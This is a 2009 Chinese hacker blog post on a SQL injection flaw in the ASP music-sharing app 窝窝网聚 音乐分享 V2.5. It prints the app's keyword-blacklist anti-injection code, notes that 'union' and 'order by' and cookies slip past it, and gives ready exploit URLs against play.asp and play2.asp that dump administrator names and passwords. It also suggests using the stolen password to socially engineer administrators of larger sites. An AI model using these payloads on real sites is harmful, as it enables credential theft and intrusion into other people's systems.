导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

« ESCMS 一个鸡肋的上传漏洞Wordpress Plugin WP-Syntax < = 0.9.1 Remote Command Execution PoC »

2009-8-13 13:23:29

窝窝网聚 音乐分享 V 2.5漏洞

code by Link

blog: www.link0day.cn

转载请注明 老话了

官方是这样说这套系统的:

窝窝网聚 音乐分享 V 2.5

2.5版更新:

1.添加歌词同步功能;

2.解决播放器在其它浏览器不兼容的问题;

3.修改数据库连接导致的错误;

4.首页界面美化;



模仿一个音乐网站制作的一个简单音乐分享程序,适合个人站点使用。

代码比较简单,也适合新手学习。界面简单,美观。

主要功能:

添加音乐,评论,按播放次数排行,同步显示歌词。

后台可以修改,审核提交的歌曲,管理评论。

好可怜的功能 少到没有办法拿shell~

不过假如我们遇到一个大站 有一个分站是用这套程序的话 那么我们可以尝试利用该漏洞爆其密码 然后对管理员进行社工~ 废话不多说 我们看代码



许多文件都包含了conn.asp 我们先看那里怎么写的把:

<%
on error resume next
set conn=Server.CreateObject("ADODB.Connection")
conn.open "Driver={Microsoft Access Driver (*.mdb)};DBQ="&Server.MapPath("data/#data.mdb")
%>
<% 
'ASP通用防注入代码

'''''''''''''''''''''''''''''''''
Page_Path = LCase(Cstr(Request.ServerVariables("PATH_INFO")))
IF InStr(Page_Path,"adminzrb")=0 Then
Dim GetFlag Rem(提交方式)
Dim ErrorSql Rem(非法字符) 
Dim RequestKey Rem(提交数据)
Dim ForI Rem(循环标记)
ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare"
ErrorSql = split(ErrorSql,"~")
If Request.ServerVariables("REQUEST_METHOD")="GET" Then
GetFlag=True
Else
GetFlag=False
End If
If GetFlag Then
For Each RequestKey In Request.QueryString
For ForI=0 To Ubound(ErrorSql)
If Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<>0 Then
response.write "<script>alert(""警告:\n请不要使用敏感字符"");location.href=""index.asp"";</script>"
Response.End
End If
Next
Next 
Else
For Each RequestKey In Request.Form
For ForI=0 To Ubound(ErrorSql)
If Instr(LCase(Request.Form(RequestKey)),ErrorSql(ForI))<>0 Then
response.write "<script>alert(""警告:\n请不要使用敏感字符"");location.href=""index.asp"";</script>"
Response.End
End If
Next
Next
End If
End IF
%>

这是一个防注入文件   过滤了post 和get 但是没有过滤好cookies   cookies注入暂且不说(不过也难利用 因为过滤好了几个关键字眼 例如%)

先不说这个。。 有没有看到   我们可爱的union不在里面~? 嘿嘿 那样就证明 可以union爆~

有没有留意到没有order by没在黑名单里面? 嘿 再一次YD下~~

剩下来的工作就是找变量了~ 找啊找啊找 找到好几个~

play.asp:

是这样的~

好了 给出exp :

www.xxx.com/play.asp?id=** union select 1,admin_name,3,4,5,admin_pwd,7,8,9,10 from user

www.xxx.com/play2.asp?id=** union select 1,admin_name,3,4,5,admin_pwd,7,8,9,10 from user

登陆页面是 /login.asp

 

 

原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/ASPoday/wowowangju.html

Tags: 窝窝网聚  音乐分享  V 2.5漏洞  
发布:kissjetg | 分类:(C:)ASP程序漏洞 | 评论:0 | 引用:0 | 浏览:
  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

黑客榜之热文排行

黑客榜之本年排行

黑客榜之本月排行

黑客榜之随机文章

网站分类

搜索内容

最新评论及回复

最近发表

所属分类下的文章

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved